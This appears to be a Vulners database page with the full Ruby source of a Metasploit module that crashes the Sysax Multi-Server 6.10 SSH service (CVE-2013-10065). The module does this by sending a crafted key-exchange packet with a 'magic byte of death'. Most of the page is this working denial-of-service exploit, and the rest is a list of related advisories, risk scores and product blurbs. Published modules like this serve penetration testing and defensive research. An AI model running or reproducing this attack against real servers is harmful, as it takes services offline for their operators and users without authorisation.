">
Lucene search
+L

Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service

🗓️ 17 Mar 2013 00:00:00Reported by Matt "hostess" Andreko <[email protected]>Type 
metasploit
 metasploit
🔗 www.rapid7.com👁 42 Views

Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service. Specially-crafted SSH Key Exchange causes service cras

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2013-10065
29 May 201815:50
circl
cnnvd
CNNVD
Codeorigin Sysax Multi Server 安全漏洞
5 Aug 202500:00
cnnvd
cve
CVE
CVE-2013-10065
5 Aug 202520:05
cve
cvelist
Cvelist
CVE-2013-10065 Sysax Multi-Server <= 6.10 SSHD Key Exchange DoS
5 Aug 202520:05
cvelist
euvd
EUVD
EUVD-2013-7279
7 Oct 202500:30
euvd
nvd
NVD
CVE-2013-10065
5 Aug 202520:15
nvd
openvas
OpenVAS
Sysax Multi Server < 6.11 DOS Vulnerability - Active Check
16 Apr 201300:00
openvas
ptsecurity
Positive Technologies
PT-2025-31989 · Unknown · Sysax Multi Server
5 Aug 202500:00
ptsecurity
redhatcve
RedhatCVE
CVE-2013-10065
7 Aug 202520:31
redhatcve
vulnrichment
Vulnrichment
CVE-2013-10065 Sysax Multi-Server <= 6.10 SSHD Key Exchange DoS
5 Aug 202520:05
vulnrichment
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Dos

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Sysax Multi-Server 6.10 SSHD Key Exchange Denial of Service',
        'Description' => %q{
          This module sends a specially-crafted SSH Key Exchange causing the service to
          crash.
        },
        'Author' => 'Matt "hostess" Andreko <mandreko[at]accuvant.com>',
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2013-10065' ],
          [ 'OSVDB', '92081'],
          [ 'URL', 'https://www.mattandreko.com/2013/04/sysax-multi-server-610-ssh-dos.html']
        ],
        'DisclosureDate' => '2013-03-17',
        'Notes' => {
          'Stability' => [CRASH_SERVICE_DOWN],
          'SideEffects' => [],
          'Reliability' => []
        }
      )
    )

    register_options(
      [
        Opt::RPORT(22),
        OptString.new('CLIENTVERSION', [ true, 'The SSH client version to report.', 'Debian-5ubuntu1'])
      ]
    )
  end

  def get_packet
    delimiter = "\x00" * 3
    packet = [
      0x00, 0x00, 0x03, 0x14, 0x08, 0x14, 0xff, 0x9f,
      0xde, 0x5d, 0x5f, 0xb3, 0x07, 0x8f, 0x49, 0xa7,
      0x79, 0x6a, 0x03, 0x3d, 0xaf, 0x55, 0x00, 0x00,
      0x00, 0x7e
    ].pack('C*')
    packet << Rex::Text.rand_text_alphanumeric(126)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(16)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(158)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(158)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(106)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(106)
    packet << delimiter
    packet << "\x28" # Magic byte of death - seems to work with just about
    # anything except \x1a, the value it's supposed to be
    packet << Rex::Text.rand_text_alphanumeric(26)
    packet << delimiter
    packet << Rex::Text.rand_text_alphanumeric(27)
    packet << delimiter * 7
  end

  def run
    connect

    banner = sock.get_once || ''
    print_status("Banner: #{banner.strip}")
    sock.put('SSH-2.0-OpenSSH_5.1p1 ' + datastore['CLIENTVERSION'] + "\r\n" + get_packet)

    # Sometimes the socket closes faster than it can read, sometimes it doesn't, so catch the error just in case.
    begin
      sock.get_once
    rescue Errno::ECONNRESET => e
      vprint_error(e.message)
    end

    disconnect
  end
end

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

17 Mar 2013 00:00Current
5.3Medium risk
Vulners AI Score5.3
CVSS 3.17.5
CVSS 48.7
EPSS0.01141
SSVC
42